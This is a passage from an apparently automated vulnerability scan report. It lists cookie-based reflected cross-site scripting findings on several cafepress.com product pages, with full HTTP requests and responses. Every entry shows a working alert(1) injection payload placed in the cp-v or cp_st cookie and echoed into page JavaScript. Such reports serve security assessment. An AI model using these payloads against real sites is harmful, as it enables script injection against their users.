Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=d0403</script><script>alert(1)</script>51550576faa; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW16
Cteonnt-Length: 53764
Date: Sun, 26 Dec 2010 13:48:05 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 53764

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
omain_us = 'cafepress.com';

window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'Make'
window.cafepress.tealeaf.searchTerm = 'd0403</script><script>alert(1)</script>51550576faa'
window.cafepress.tealeaf.salesChannel = 'Make'
window.cafepress.tealeaf.trafficMedium = 'Direct'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP
...[SNIP]...

1.112. http://www.cafepress.com/make/custom-stickers [cp-v cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/make/custom-stickers

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 181d3"-alert(1)-"e0b5be905e5 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /make/custom-stickers HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA181d3"-alert(1)-"e0b5be905e5; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW27
ntCoent-Length: 55169
Date: Sun, 26 Dec 2010 13:48:14 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 55169

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";


   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA181d3"-alert(1)-"e0b5be905e5";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {

       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.113. http://www.cafepress.com/make/custom-stickers [cp_st cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/make/custom-stickers

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a4548</script><script>alert(1)</script>1bf2219952e was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /make/custom-stickers HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=a4548</script><script>alert(1)</script>1bf2219952e; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW17
Cteonnt-Length: 55191
Date: Sun, 26 Dec 2010 13:48:12 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 55191

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
omain_us = 'cafepress.com';

window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'Make'
window.cafepress.tealeaf.searchTerm = 'a4548</script><script>alert(1)</script>1bf2219952e'
window.cafepress.tealeaf.salesChannel = 'Make'
window.cafepress.tealeaf.trafficMedium = 'SEO'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP_08
...[SNIP]...

1.114. http://www.cafepress.com/make/custom-stockings [cp-v cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/make/custom-stockings

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1a524"-alert(1)-"630f88fb7a4 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /make/custom-stockings HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA1a524"-alert(1)-"630f88fb7a4; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW27
ntCoent-Length: 52631
Date: Sun, 26 Dec 2010 13:48:26 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 52631

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";


   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA1a524"-alert(1)-"630f88fb7a4";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {

       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.115. http://www.cafepress.com/make/custom-stockings [cp_st cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/make/custom-stockings

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 75fbc</script><script>alert(1)</script>3209aface0d was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /make/custom-stockings HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=75fbc</script><script>alert(1)</script>3209aface0d; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW13
Cteonnt-Length: 52650
Date: Sun, 26 Dec 2010 13:48:25 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 52650

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
omain_us = 'cafepress.com';

window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'Make'
window.cafepress.tealeaf.searchTerm = '75fbc</script><script>alert(1)</script>3209aface0d'
window.cafepress.tealeaf.salesChannel = 'Make'
window.cafepress.tealeaf.trafficMedium = 'SEO'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP_08
...[SNIP]...

1.116. http://www.cafepress.com/make/custom-t-shirts [cp-v cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/make/custom-t-shirts

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d8dde"-alert(1)-"0740f775c1c was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /make/custom-t-shirts HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BAd8dde"-alert(1)-"0740f775c1c; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW28
ntCoent-Length: 112228
Date: Sun, 26 Dec 2010 13:48:09 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 112228

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";


